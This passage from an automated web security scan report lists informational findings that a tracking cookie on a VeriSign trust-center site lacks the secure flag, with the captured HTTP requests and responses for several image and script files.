HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 13169 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.......................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46...[SNIP]...
6.36. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/sm_004276_oo.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: Apache Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 597 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a . .....Bv...!..NETSCAPE2.0.....!.. ....,.... . ......h.i.X.oU...m. ..!.. ....,...... ......y........2.M.Z..!.. ....,...... .....b.x...bS.. .!.. ....,...... ...........s.M. .!.. ....,...... .......[SNIP]...
6.37. https://trust-center.verisign.com/rcm/verisign/images/truste.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/truste.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/truste.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2232 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89aD.T..........utt..<q.7...?<<..p..<......'#$La+.........TQR..Tfff........+......+."HEFa.1.................1......BQ'..c333..K..B......" }.&_]]..8................+,...6<%...Up.........3..?..E..0....[SNIP]...
6.38. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermArrow.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 71 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.............!.......,.............i.....0...U......t$b.G..c.%..;
6.39. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermBgM.jpg
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 956 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ ..................C....... .. .......................................................'......................................[SNIP]...
6.40. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermWtB.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 978 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
6.41. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermWtT.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 997 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a ................................. ............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>...[SNIP]...
6.42. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/tsTermWtT.jpg
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Content-Length: 876 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/jpeg ......JFIF.....H.H.....C............................................ .....................(............................... ...2......................U..........!"6AGu....123q.........?..Y...x.zWG...[SNIP]...
6.43. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/webtrust.gif
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/webtrust.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 2221 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a..C...................................................................................................z.....f..O..3........3...f..}..3......r .f..ffff.ff.fffKa.3f.3ffWY_2PwCDL33.33f333(0I.3..3f....[SNIP]...
6.44. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/account_signin.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/account_signin.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 741 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function lost_password(formName,referrerPath,username){var form=document.forms[formName];var usernameObj=getElement(username);form.action="/process/retail/account_lost_password?username="+escape(user...[SNIP]...
6.45. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/chat_support.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/chat_support.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:37 GMT Server: Apache Set-Cookie: TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 423 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function agents_available(onclickLink,imgLink){var sb=document.getElementById('smartbutton');if(sb){sb.innerHTML='<A HREF="" onClick="window.open(\''+onclickLink+'\',\'custclient\',\'width=500,height...[SNIP]...
6.46. https://trust-center.verisign.com/rcm/verisign/scripts/default.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/default.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/default.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:34 GMT Server: Apache Set-Cookie: TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 2794 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript function initGoogleAnalytics(){_uacct="UA-230424-1";urchinTracker();} function clearButtonSubmits(){if(document.forms){for(var i=0,l=document.forms.length;i<l;i++){if(document.forms[i].button_back){d...[SNIP]...
6.47. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/oo_conf_en-US_inline.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/scripts/oo_conf_en-US_inline.js HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=62FB56A4DB2A10DB6A70CEC4D1E75D2A
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:36 GMT Server: Apache Set-Cookie: TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 1674 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: application/javascript /* OnlineOpinion v4.1.7 */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ /* Create new OnlineOpini...[SNIP]...
6.48. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/scripts/oo_engine_c.js
Issue detail
